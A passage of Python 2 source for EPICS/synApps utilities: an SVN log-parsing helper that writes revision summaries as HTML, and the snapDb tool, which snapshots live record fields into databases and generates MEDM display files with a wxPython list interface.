return(tagList)
def highestRevisionNum(module, dir):
maxRev = -1
maxTag = "None"
revDate = "None"
tagList = commands.getoutput("svn ls -v %s/%s/%s" % (SVN,module,dir)).split('\n')
#print "tagList:", tagList
for tag in tagList:
words = tag.split()
thisRev = int(words[0])
thisTag = words[5]
if (thisRev > maxRev) and (thisTag != "./"):
maxTag = words[5][:-1] # strip trailing slash
maxRev = thisRev
revDate = " ".join(words[2:5])
return (maxRev, maxTag, revDate)
def log(module, tag1=None, tag2=None):
# Find the difference between tag1 and tag2, or between tag1 and trunk
if tag2 == None:
if tag1 == None:
(tagRevNum, tag1, date1) = highestRevisionNum(module, 'tags')
print "Most recent tag (revision) is %s (%d) on %s" % (tag1, tagRevNum, date1)
else:
reply = commands.getoutput("svn ls -v %s/%s/%s" % (SVN,module,'tags/'+tag1))
tagList = reply.split('\n')
words = tagList[0].split()
try:
(tagRevNum, date1) = (int(words[0]), " ".join(words[2:5]))
except:
print "* * * Error: '%s', using most recent tag instead\n" % reply
(tagRevNum, tag1, date1) = highestRevisionNum(module, 'tags')
(trunkRevNum, xx, date2) = highestRevisionNum(module, 'trunk')
print "log from tag '%s' (%s on %s) to trunk (%s on %s)" % (tag1, tagRevNum, date1, trunkRevNum, date2)
if (tagRevNum > trunkRevNum):
l = "No changes"
else:
l = commands.getoutput("svn log -v -r %d:%d %s/%s" % (tagRevNum, trunkRevNum, SVN, module))
else:
(tag1RevNum, xx, date1) = highestRevisionNum(module, 'tags/'+tag1)
(tag2RevNum, xx, date2) = highestRevisionNum(module, 'tags/'+tag2)
print "log from tag '%s' (%s) to tag '%s' (%s)" % (tag1, date1, tag2, date2)
l = commands.getoutput("svn log -v -r %d:%d %s/%s" % (tag1RevNum, tag2RevNum, SVN, module))
l = l.split('\n')
return(l)
typeName = {'A': 'Added',
'C': 'Conflicted',
'D': 'Deleted',
'I': 'Ignored',
'M': 'Modified',
'R': 'Replaced',
'X': 'unversioned external',
'?': 'unknown',
'!': 'missing'}
def parseLog(lines, debug=False):
revisions = {}
currRev = None
section = None
for l in lines:
if debug>1: print("LINE='%s'" % l)
if len(l) == 0:
if debug>1: print('ignored')
if section == 'files': section = 'message'
continue
if l[0] == '-' and l.strip('-') == '':
if debug>1: print('separator')
currRev = None
section = None
continue
if currRev == None and l[0] == 'r':
currRev = l.split()[0]
if debug: print("revision:'%s'" % currRev)
revisions[currRev] = {'files':[], 'message':[]}
continue
if currRev and l == 'Changed paths:':
section = 'files'
if debug>1: print('ignored')
continue
if currRev and (section == 'files') and l[0].isspace():
(typeLetter,file) = l.lstrip(' ').split(' ', 1)
type = typeName[typeLetter]
if file.count(' '):
file = file.split(' ',1)[0]
if debug: print(" type ='%s', file = '%s'" % (type, file))
revisions[currRev]['files'].append([type, file])
continue
if currRev and (section == 'message'):
if debug: print(" commit message:'%s'" % l)
revisions[currRev]['message'].append(l)
return(revisions)
import os
def printRevisions(revs):
for key in revs.keys():
print(key)
for f in revs[key]['files']:
print("\t%s %s" % (f[0],os.path.basename(f[1])))
for m in revs[key]['message']:
print("\t%s" % m)
def printRevisionsHTML(revs,file=None):
if file == None:
fp = sys.stdout
else:
fp = open(file,'w')
fp.write("<html>\n")
fp.write("<body>\n")
fp.write('<dl>\n')
for key in revs.keys():
if (len(revs[key]['message'])) > 0 and (
revs[key]['message'][0][:39] == "This commit was manufactured by cvs2svn"):
continue
fp.write('\n<p><dt>')
for f in revs[key]['files']:
fp.write("%s %s<br>\n" % (f[0],os.path.basename(f[1])))
fp.write('<dd>')
for m in revs[key]['message']:
fp.write("<br>%s\n" % m)
fp.write('</dl>\n')
fp.write("</body>\n")
fp.write("</html>\n")
fp.close()
def main():
#print "sys.arvg:", sys.argv
if len(sys.argv) == 4:
s = log(sys.argv[1], sys.argv[2], sys.argv[3])
for line in s: print(line)
elif len(sys.argv) == 3:
s=log(sys.argv[1], sys.argv[2])
for line in s: print(line)
elif len(sys.argv) == 2:
s=log(sys.argv[1])
for line in s: print(line)
# elif len(sys.argv) == 2:
# s=tags(sys.argv[1])
# for line in s: print(line)
else:
print (usage)
return
if __name__ == "__main__":
main()
```
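A usage sketch (again Python 2, and it assumes network access to the synApps Subversion server); the module and tag names are illustrative:
```python
# Illustrative module/tags; requires Python 2 and access to the SVN server.
lines = log("sscan", "R2-6", "R2-7")  # 'svn log -v' between the two tags
revs = parseLog(lines)
printRevisionsHTML(revs, file="sscan_R2-6_to_R2-7.html")
```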
#### File: utils/snapDb/snapDb.py
```python
import sys
import dbd
import os
import wx
import wx.lib.mixins.listctrl as listmix
#import test_listctrl as listmix
HAVE_CA = True
try:
from ca_util import *
import ca
except:
HAVE_CA = False
databasePath = os.getcwd()
medmPath = os.getcwd()
displayInfo = {
'aSub': ('anyRecord.adl', 'P', 'R'),
'acalcout': ('yyArrayCalc.adl', 'P', 'C'),
'ai': ('anyRecord.adl', 'P', 'R'),
'ao': ('anyRecord.adl', 'P', 'R'),
'asyn': ('asynRecord.adl', 'P', 'R'),
'bi': ('anyRecord.adl', 'P', 'R'),
'bo': ('anyRecord.adl', 'P', 'R'),
'busy': ('busyRecord.adl', 'P', 'B'),
'calc': ('CalcRecord.adl', 'P', 'C'),
'calcout': ('yyCalcoutRecord.adl', 'P', 'C'),
'compress': ('anyRecord.adl', 'P', 'R'),
'dfanout': ('anyRecord.adl', 'P', 'R'),
'epid': ('pid_control.adl', 'P', 'PID'),
'event': ('anyRecord.adl', 'P', 'R'),
'fanout': ('anyRecord.adl', 'P', 'R'),
'longin': ('anyRecord.adl', 'P', 'R'),
'longout': ('anyRecord.adl', 'P', 'R'),
'mbbi': ('anyRecord.adl', 'P', 'R'),
'mbbiDirect': ('anyRecord.adl', 'P', 'R'),
'mbbo': ('anyRecord.adl', 'P', 'R'),
'mbboDirect': ('anyRecord.adl', 'P', 'R'),
'mca': ('anyRecord.adl', 'P', 'R'),
'motor': ('motorx.adl', 'P', 'M'),
'permissive': ('anyRecord.adl', 'P', 'R'),
'scalcout': ('yysCalcoutRecord.adl', 'P', 'C'),
'scaler': ('anyRecord.adl', 'P', 'R'),
'scanparm': ('anyRecord.adl', 'P', 'R'),
'sel': ('anyRecord.adl', 'P', 'R'),
'seq': ('yySeq.adl', 'P', 'S'),
'sscan': ('scanAux.adl', 'P', 'S'),
'sseq': ('yySseq.adl', 'P', 'S'),
'state': ('anyRecord.adl', 'P', 'R'),
'stringin': ('anyRecord.adl', 'P', 'R'),
'stringout': ('anyRecord.adl', 'P', 'R'),
'sub': ('anyRecord.adl', 'P', 'R'),
'subArray': ('anyRecord.adl', 'P', 'R'),
'swait': ('yyWaitRecord.adl', 'P', 'C'),
'table': ('anyRecord.adl', 'P', 'R'),
'timestamp': ('anyRecord.adl', 'P', 'R'),
'transform': ('yyTransform.adl', 'P', 'T'),
'vme': ('anyRecord.adl', 'P', 'R'),
'waveform': ('anyRecord.adl', 'P', 'R')
}
def writePromptGroupFields(dbdFile, outFile=None):
dbd_object = dbd.readDBD(dbdFile)
if not dbd_object:
return
if (outFile):
fp = open(outFile, "w")
else:
fp = sys.stdout
for r in dbd_object.recordtypeDict.keys():
fp.write("recordtype %s\n" % r)
recordType = dbd_object.recordtypeDict[r]
for fieldName in recordType.fieldList:
fieldDict = recordType.fieldDict[fieldName]
if 'promptgroup' in fieldDict.keys():
fp.write("\t%s (%s)\n" % (fieldName, fieldDict['prompt']))
    if fp != sys.stdout:
        fp.close()
def makeReplaceDict(replaceTargets, replaceStrings):
replaceDict = {}
for i in range(len(replaceTargets)):
replaceDict[replaceTargets[i]] = replaceStrings[i]
return replaceDict
def readDisplayInfoFile(fileName):
global displayInfo
if (fileName):
fp = open(fileName, "r")
else:
#print "readDisplayInfoFile: No filename specified; nothing done."
return displayInfo
di = displayInfo
for line in fp.readlines():
words = line.lstrip().split()
if (len(words) < 3):
continue
if (words[0][0] == '#'):
continue
di[words[0]] = tuple(words[1:])
return di
# Read an existing database to populate or supplement the lists of record names and types
def openDatabase(fileName, recordNames=[], recordTypes=[], displayStrings=[], replaceDict={}):
if (fileName):
file = open(fileName, "r")
else:
#print "openDatabase: No filename specified; nothing done."
return recordNames
for rawLine in file :
global displayInfo
rawLine = rawLine.lstrip()
rawLine = dbd.doReplace(rawLine, replaceDict, reverse=True)
split1 = rawLine.split("(")
#print "openDatabase: split1=%s" % split1
if len(split1[0]) > 0 and split1[0][0] == '#':
continue
if split1[0] == "record":
rType = rawLine.split('(')[1].split(',')[0]
rName = rawLine.split('"') [1]
#print "openDatabase: found record: '%s'" % rName
if rName not in recordNames:
recordNames.append(rName)
recordTypes.append(rType)
if rType in displayInfo.keys():
(prefix, name) = rName.split(':', 1)
prefix = dbd.doReplace(prefix+':', replaceDict)
name = dbd.doReplace(name, replaceDict)
dString = displayInfo[rType][0] + ';'
dString += displayInfo[rType][1] + '=%s,' % prefix
dString += displayInfo[rType][2] + '=%s' % name
displayStrings.append(dString)
else:
#print "no displayInfo for record type '%s'" % rType
displayStrings.append("")
return (recordNames, recordTypes, displayStrings)
nowrite_fields = ['PROC', 'UDF']
# We're using the existence of a "promptgroup()" entry in the record definition to determine
# whether a field can be defined in a database, but really promptgroup only says whether the
# field is *intended* or expected to be defined in a database. Some records do not have promptgroup
# entries for fields that we want to define in the database:
def kludgePromptGroup(recordType, fieldName):
if recordType == "scalcout" and fieldName in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:
return True
if recordType == "sub" and fieldName in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:
return True
return False
def defineNewDatabase(pvList, dbd_object, fixUserCalcs=True):
"""
Software to support the use of run-time programming to prototype an EPICS database.
usage:
defineNewDatabase(pvList, dbd_object, fixUserCalcs=True)
example:
dbd_object = dbd.readDBD("myDBDFile.dbd")
defineNewDatabase(['xxx:myCalc.SCAN','xxx:myTran.DESC'], dbd_object)
Reads all current field values from the records mentioned in 'pvList', and
collects values from live record instances. Field definitions and default
field values are looked up in the dbdClass object, dbd_object; only non-default
values are included.
If you are using actual userCalcs (userTransforms, etc.) to prototype,
you'll probably not want the Enable/Disable support built into userCalcs
to be reproduced in the new database. By default (fixUserCalcs==True),
records whose names begin with '*:user' are treated specially: live values
of the SDIS, DISA, and DISV fields are replaced by default field values.
"""
if not HAVE_CA :
print("Can't import ca_util")
return None
# From pvList, compile a list of unique record instances
recordNameList = [] # just to avoid duplication
recordInstanceList = []
for pv in pvList:
recordName = pv.split('.')[0]
if recordName not in recordNameList:
try:
recordType = caget(recordName+".RTYP")
except:
continue
recordNameList.append(recordName)
recordInstanceList.append(dbd.recordInstance(recordName, recordType))
del recordNameList
for r in recordInstanceList:
recordType = dbd_object.recordtypeDict[r.recordType]
for fieldName in recordType.fieldList:
if recordType.fieldType[fieldName] == 'DBF_NOACCESS':
continue
if fieldName in nowrite_fields:
continue
fieldDict = recordType.fieldDict[fieldName]
if ('special' in fieldDict.keys()):
if (fieldDict['special'] in ['SPC_NOMOD', 'SPC_DBADDR']):
continue
if 'promptgroup' in fieldDict.keys() or kludgePromptGroup(r.recordType, fieldName):
pv = r.recordName+'.'+fieldName
#print("trying %s..." % pv)
try:
value = caget(pv)
except:
value = 0
try:
string_value = caget(pv,req_type=ca.DBR_STRING)
except:
string_value = "Caget failed"
#print("%s='%s'" % (recordName+'.'+fieldName, value))
if string_value != "Caget failed":
if dbd.isDefaultValue(value, r.recordType, fieldName, dbd_object):
continue
if (fixUserCalcs and r.recordName.find(':user') and
fieldName in ['DISA', 'DISV', 'SDIS']):
continue
r.fieldNames.append(fieldName)
r.fieldValues.append(string_value)
return recordInstanceList
def writeNewDatabase(fileName, pvList, dbdFileName, replaceDict=None, fixUserCalcs=True):
dbd_object = dbd.readDBD(dbdFileName)
recordInstanceList = defineNewDatabase(pvList, dbd_object, fixUserCalcs)
dbd.writeDatabase(fileName, recordInstanceList, replaceDict)
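# A hedged usage sketch for the snapshot path above; the PV names, .dbd path,
# and macro substitutions are placeholders (channel access must be available):
#   writeNewDatabase("prototype.db",
#                    ["xxx:userCalc1.SCAN", "xxx:userTran1.DESC"],
#                    "softIoc.dbd",
#                    replaceDict={"xxx:": "$(P)"},
#                    fixUserCalcs=True)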
def writeColorTable(fp):
fp.write('"color map" {\n\tncolors=65\n\tcolors {\n\t\tffffff,\n\t\tececec,\n\t\tdadada,\n\t\tc8c8c8,\n')
fp.write('\t\tbbbbbb,\n\t\taeaeae,\n\t\t9e9e9e,\n\t\t919191,\n\t\t858585,\n\t\t787878,\n\t\t696969,\n')
fp.write('\t\t5a5a5a,\n\t\t464646,\n\t\t2d2d2d,\n\t\t000000,\n\t\t00d800,\n\t\t1ebb00,\n\t\t339900,\n')
fp.write('\t\t2d7f00,\n\t\t216c00,\n\t\tfd0000,\n\t\tde1309,\n\t\tbe190b,\n\t\ta01207,\n\t\t820400,\n')
fp.write('\t\t5893ff,\n\t\t597ee1,\n\t\t4b6ec7,\n\t\t3a5eab,\n\t\t27548d,\n\t\tfbf34a,\n\t\tf9da3c,\n')
fp.write('\t\teeb62b,\n\t\te19015,\n\t\tcd6100,\n\t\tffb0ff,\n\t\td67fe2,\n\t\tae4ebc,\n\t\t8b1a96,\n')
fp.write('\t\t610a75,\n\t\ta4aaff,\n\t\t8793e2,\n\t\t6a73c1,\n\t\t4d52a4,\n\t\t343386,\n\t\tc7bb6d,\n')
fp.write('\t\tb79d5c,\n\t\ta47e3c,\n\t\t7d5627,\n\t\t58340f,\n\t\t99ffff,\n\t\t73dfff,\n\t\t4ea5f9,\n')
fp.write('\t\t2a63e4,\n\t\t0a00b8,\n\t\tebf1b5,\n\t\td4db9d,\n\t\tbbc187,\n\t\ta6a462,\n\t\t8b8239,\n')
fp.write('\t\t73ff6b,\n\t\t52da3b,\n\t\t3cb420,\n\t\t289315,\n\t\t1a7309,\n\t}\n}\n')
import math
def makeGrid(geom, border, maxWidth, maxHeight):
numDisplays = len(geom)
numX = max(1,int(round(math.sqrt(numDisplays), 0)))
numY = max(1, int(numDisplays / numX))
if numX*numY < numDisplays: numY += 1
#print "numDisplays, numX, numY=", numDisplays, numX, numY
if maxWidth > maxHeight*2:
numX = max(1,int(round(numX/2, 0)))
numY = max(1, int(numDisplays / numX))
if numX*numY < numDisplays: numY += 1
elif maxHeight > maxWidth*2:
numY = max(1,int(round(numY/2, 0)))
numX = max(1, int(numDisplays / numY))
if numX*numY < numDisplays: numX += 1
#print "numDisplays, numX, numY=", numDisplays, numX, numY
ix = -1
iy = 0
newGeom = []
maxWidth += border
maxHeight += border
for i in range(len(geom)):
ix += 1
if ix >= numX:
ix = 0
iy += 1
newGeom.append((border+ix*maxWidth, border+iy*maxHeight, geom[i][2], geom[i][3]))
totalWidth = numX * maxWidth + border
totalHeight = numY * maxHeight + border
return (newGeom, totalWidth, totalHeight)
def writeNewMEDM_Composites(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
geom=[]
totalWidth = 0
totalHeight = 10
maxWidth = 0
maxHeight = 0
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
displayFile = findFileInPath(display, EPICS_DISPLAY_PATH)
if not displayFile:
print "Can't find display file '%s' in EPICS_DISPLAY_PATH" % display
return
#print "writeNewMEDM_Composites: displayFile = ", displayFile
dFile = open(displayFile, "r")
lines = dFile.readlines()
dFile.close()
for i in range(len(lines)):
line = lines[i].lstrip()
if line.startswith('width'):
width = int(line.split('=')[1])
height = int(lines[i+1].lstrip().split('=')[1])
geom.append((10, totalHeight, width, height))
maxWidth = max(maxWidth, width)
maxHeight = max(maxHeight, height)
totalWidth = max(width, totalWidth)
totalHeight += height+10
break
totalWidth += 20
#print "writeNewMEDM_Composites: displayFile '%s'; w=%d,h=%d " % (displayFile, width, height)
(geom, totalWidth, totalHeight) = makeGrid(geom, 10, maxWidth, maxHeight)
if (fileName):
fp = open(fileName, "w")
else:
fp = sys.stdout
fp.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
fp.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' %
(100, 100, totalWidth, totalHeight))
fp.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(fp)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(x,y,w,h) = geom[i]
fp.write('composite {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' % (x,y, w, h))
(display, macro) = displayString.split(';')
newMacro = dbd.doReplace(macro, replaceDict)
newName = dbd.doReplace(rName, replaceDict)
fp.write('\t"composite name"=""\n')
fp.write('\t"composite file"="%s;%s"\n}\n' % (display, newMacro))
fp.close()
def writeNewMEDM_RDButtons(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
if (fileName):
file = open(fileName, "w")
else:
file = sys.stdout
file.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
file.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' % (100, 100, 200, 20+len(recordNames)*25))
file.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(file)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
file.write('"related display" {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=150\n\t\theight=20\n\t}\n' % (10, 10+i*25))
(display, macro) = displayString.split(';')
newMacro = dbd.doReplace(macro, replaceDict)
newName = dbd.doReplace(rName, replaceDict)
file.write('\tdisplay[0] {\n\t\tlabel="%s"\n\t\tname="%s"\n\t\targs="%s"\n\t}\n' % (newName, display, newMacro))
file.write('\tclr=14\n\tbclr=51\n\tlabel="%c%s"\n}\n' % ('-', newName))
file.close()
# For now, the following function can write an medm file for only a single record
def writeNewMEDM_Objects(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
geom=[]
totalWidth = 0
totalHeight = 10
maxWidth = 0
maxHeight = 0
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
displayFile = findFileInPath(display, EPICS_DISPLAY_PATH)
if not displayFile:
print "Can't find display file '%s' in EPICS_DISPLAY_PATH" % display
return
#print "writeNewMEDM_Composites: displayFile = ", displayFile
dFile = open(displayFile, "r")
lines = dFile.readlines()
dFile.close()
for i in range(len(lines)):
line = lines[i].lstrip()
if line.startswith('width'):
width = int(line.split('=')[1])
height = int(lines[i+1].lstrip().split('=')[1])
geom.append((10, totalHeight, width, height))
maxWidth = max(maxWidth, width)
maxHeight = max(maxHeight, height)
totalWidth = max(width, totalWidth)
totalHeight += height+10
break
totalWidth += 20
#print "writeNewMEDM_Composites: displayFile '%s'; w=%d,h=%d " % (displayFile, width, height)
# Get only the lines we'll use from the medm file
startLine = 0
for i in range(len(lines)):
if (lines[i].startswith('"color map')):
numColors = int(lines[i+1].split("=")[1])
startLine = i+numColors+5
#print "start line:", lines[startLine]
(geom, totalWidth, totalHeight) = makeGrid(geom, 10, maxWidth, maxHeight)
if (fileName):
fp = open(fileName, "w")
else:
fp = sys.stdout
fp.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
fp.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' %
(100, 100, totalWidth, totalHeight))
fp.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(fp)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
macros = macro.split(",")
rDict = {}
for m in macros:
(target, replacement) = m.split("=")
target = '$(%s)' % target
rDict[target] = replacement
(x,y,w,h) = geom[i]
for line in lines[startLine:]:
l = dbd.doReplace(line, rDict)
fp.write(dbd.doReplace(l, replaceDict))
fp.close()
###################################################################
# GUI STUFF
###################################################################
# From Python Cookbook
import re
re_digits = re.compile(r'(\d+)')
def embedded_numbers(s):
pieces = re_digits.split(s) # split into digits/nondigits
pieces[1::2] = map(int, pieces[1::2]) # turn digits into numbers
return pieces
def sort_strings_with_embedded_numbers(alist):
aux = [ (embedded_numbers(s), s) for s in alist ]
aux.sort()
return [ s for __, s in aux ] # convention: __ means "ignore"
def cmpStringsWithEmbeddedNumbers(s1, s2):
if s1 == s2: return 0
ss = sort_strings_with_embedded_numbers([s1,s2])
if ss[0] == s1: return 1
return -1
def parseReplacementsFromEnvString(s):
replacements = s.split(',')
replaceDict = {}
for rep in replacements:
target, string = rep.split('=')
replaceDict[target]=string
return replaceDict
def findFileInPath(file, pathList):
for path in pathList:
fullPath = os.path.join(path, file)
if os.path.isfile(fullPath):
return(fullPath)
return("")
class myList(wx.ListCtrl, listmix.ColumnSorterMixin, listmix.ListCtrlAutoWidthMixin, listmix.TextEditMixin):
def __init__(self, parent, frame, purpose):
wx.ListCtrl.__init__(
self, parent, -1, style=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.parent = parent
self.frame = frame
self.purpose = purpose
self.itemDataMap = {}
if purpose == "recordNames":
numColumns = 3
self.InsertColumn(0, "Record name")
self.InsertColumn(1, "Record type")
self.InsertColumn(2, "Display string")
else:
numColumns = 2
self.InsertColumn(0, "Live string")
self.InsertColumn(1, "In-File string")
# fill list
if self.purpose == "recordNames":
i = 0
if len(self.frame.recordNames) > 0:
for i in range(len(self.frame.recordNames)):
self.itemDataMap[i] = (self.frame.recordNames[i], self.frame.recordTypes[i], self.frame.displayStrings[i])
i += 1
self.itemDataMap[i] = (
"Record name",
"Record type",
"abc.adl;P=$(P),R=yy"
)
else:
i = 0
if len(self.frame.replaceTargets) > 0:
for i in range(len(self.frame.replaceTargets)):
self.itemDataMap[i] = (self.frame.replaceTargets[i], self.frame.replaceStrings[i])
i += 1
self.itemDataMap[i] = (
"Live string",
"In-File string",
)
self.lastKey = i
items = self.itemDataMap.items()
for (i, data) in items:
self.InsertStringItem(i, data[0])
self.SetItemData(i, i)
self.SetStringItem(i, 1, data[1])
if numColumns > 2:
self.SetStringItem(i, 2, data[2])
self.SetItemTextColour(self.lastKey, "red")
listmix.ColumnSorterMixin.__init__(self, numColumns)
listmix.TextEditMixin.__init__(self)
for i in range(numColumns):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE)
# Bind events to code
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected, self)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected, self)
self.selectedItems = set()
# for wxMSW
self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self.OnRightClick)
# for wxGTK
self.Bind(wx.EVT_RIGHT_UP, self.OnRightClick)
# for edit veto
#self.Bind(wx.EVT_COMMAND_LIST_BEGIN_LABEL_EDIT, self.OnEditRequest)
def SetStringItem(self, index, col, data):
#if self.purpose == "recordNames":
# print "SetStringItem: index=", index, " col=", col, " data='%s'" % data
# print "SetStringItem: GetItemData(%d)=%d" % (index, self.GetItemData(index))
if index < len(self.frame.displayStrings) and col == 2: #only for this column do we permit edits (only medm display string)
wx.ListCtrl.SetStringItem(self, index, col, data)
self.frame.displayStrings[self.GetItemData(index)] = str(data)
# if self.purpose == "recordNames":
# print "displayStrings='%s'\n" % self.frame.displayStrings
else:
wx.ListCtrl.SetStringItem(self, index, col, self.itemDataMap[index][col])
def GetListCtrl(self):
return self
def GetColumnSorter(self):
"""Returns a callable object to be used for comparing column values when sorting."""
return self.__ColumnSorter
def __ColumnSorter(self, key1, key2):
col = self._col
ascending = self._colSortFlag[col]
if key1 == self.lastKey:
return 1
if key2 == self.lastKey:
return -1
item1 = self.itemDataMap[key1][col]
item2 = self.itemDataMap[key2][col]
cmpVal = cmpStringsWithEmbeddedNumbers(item1, item2)
if cmpVal == 0:
item1 = self.itemDataMap[key1][0]
item2 = self.itemDataMap[key2][0]
#cmpVal = locale.strcoll(str(item1), str(item2))
cmpVal = cmpStringsWithEmbeddedNumbers(item1, item2)
if cmpVal == 0:
cmpVal = key1 < key2
if ascending:
return cmpVal
else:
return -cmpVal
# evidently there is a way to veto a list-edit event, and I'd like to
# do this, but don't know how. Here's some test code motivated by the OpenEditor
# function from wx.lib.mixins.listctrl.py's TextEditMixin class.
def OnEditRequest(self, event):
pass
#print "OnEditRequest: event=", event, " row=", event.m_itemIndex, " col=", event.m_col
def OnItemSelected(self, event):
self.selectedItems.add(event.m_itemIndex)
#print "OnItemSelected: GetIndex=%d" % event.GetIndex()
listmix.TextEditMixin.OnItemSelected(self, event)
event.Skip()
def OnItemDeselected(self, event):
if event.m_itemIndex in self.selectedItems:
self.selectedItems.remove(event.m_itemIndex)
event.Skip()
def OnRightClick(self, event):
# only do this part the first time so the events are only bound once
if not hasattr(self, "popupID1"):
self.popupID1 = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPopupOne, id=self.popupID1)
if self.purpose == "recordNames":
self.popupID2 = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPopupTwo, id=self.popupID2)
if (len(self.itemDataMap) <= 1):
return
# make a menu
menu = wx.Menu()
# add some items
menu.Append(self.popupID1, "Delete from list")
if self.purpose == "recordNames":
menu.Append(self.popupID2, "Write MEDM display for this record")
# Popup the menu. If an item is selected then its handler
# will be called before PopupMenu returns.
self.PopupMenu(menu)
menu.Destroy()
def OnPopupOne(self, event):
#print "OnPopupOne"
#print "selected items:", self.selectedItems
items = list(self.selectedItems)
item = items[0]
if self.purpose == "recordNames":
if item < len(self.frame.recordNames):
self.DeleteItem(item)
del self.frame.recordNames[item]
del self.frame.recordTypes[item]
del self.frame.displayStrings[item]
#print "records:", self.frame.recordNames
else:
if item < len(self.frame.replaceTargets):
self.DeleteItem(item)
del self.frame.replaceTargets[item]
del self.frame.replaceStrings[item]
#print "replaceTargets:", self.frame.replaceTargets
# Although self.selectedItems may contain several items, we're only going to
# write a file for the first one.
def OnPopupTwo(self, event):
#print "OnPopupTwo"
#print "selected items:", self.selectedItems
if (len(self.itemDataMap) <= 1):
return
global medmPath
if len(self.frame.recordNames) <= 0:
return
wildcard = "(*.adl)|*.adl|All files (*.*)|*.*"
if medmPath == "":
medmPath = os.getcwd()
items = list(self.selectedItems)
item = items[0]
if item >= len(self.frame.recordNames):
return
recordNameList = [self.frame.recordNames[item]]
fileName = recordNameList[0]
if fileName.find(":"):
fileName = fileName.split(":")[1]
fileName += ".adl"
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=medmPath, defaultFile=fileName, wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
medmPath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and medmPath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
recordNameList = [self.frame.recordNames[item]]
recordTypeList = [self.frame.recordTypes[item]]
displayStringList = [self.frame.displayStrings[item]]
replaceDict = makeReplaceDict(self.frame.replaceTargets, self.frame.replaceStrings)
writeNewMEDM_Objects(medmPath, recordNameList, recordTypeList, displayStringList, replaceDict, self.frame.EPICS_DISPLAY_PATH)
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
class myListPanel(wx.Panel):
def __init__(self, parent, frame, purpose):
wx.Panel.__init__(self, parent, -1, style=wx.BORDER_SUNKEN)
#wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.frame = frame
self.purpose = purpose
sizer = wx.BoxSizer(wx.VERTICAL)
if purpose == "recordNames":
title = wx.StaticText(self, -1, "Record list: Click column head to sort.\nRight click on entry to delete, or write MEDM file.\nLeft click in display string to edit. (Note that entire item must be visible to edit it.)")
else:
title = wx.StaticText(self, -1, "Replacement list: Click column head to sort.\nRight click on entry to delete.")
sizer.Add(title, 0, wx.ALL, 5)
self.list = myList(self, self.frame, self.purpose)
sizer.Add(self.list, 1, wx.LEFT|wx.RIGHT|wx.EXPAND, 5)
self.SetSizer(sizer)
class MainPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.bottomWin = wx.SashLayoutWindow(self, -1, (-1,-1), (200, 30), wx.SW_3D)
self.bottomWin.SetDefaultSize((-1, 25))
self.bottomWin.SetOrientation(wx.LAYOUT_HORIZONTAL)
self.bottomWin.SetAlignment(wx.LAYOUT_BOTTOM)
# Doesn't work; have to do it by hand in self.OnSashDrag()
#self.bottomWin.SetMinimumSizeY(30)
self.topWin = wx.SashLayoutWindow(self, -1, (-1,-1), (-1, -1), wx.SW_3D)
(x,y) = self.parent.GetClientSize()
self.topWin.SetDefaultSize((-1, y-30))
self.topWin.SetOrientation(wx.LAYOUT_HORIZONTAL)
self.topWin.SetAlignment(wx.LAYOUT_TOP)
self.topWin.SetSashVisible(wx.SASH_BOTTOM, True)
self.topWin.SetMinimumSizeY(30)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.topWin.GetId())
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnSashDrag(self, event):
#print "OnSashDrag: height=", event.GetDragRect().height
(pW, pH) = self.parent.GetClientSize()
#print "OnSashDrag: clientHeight=", pH
eobj = event.GetEventObject()
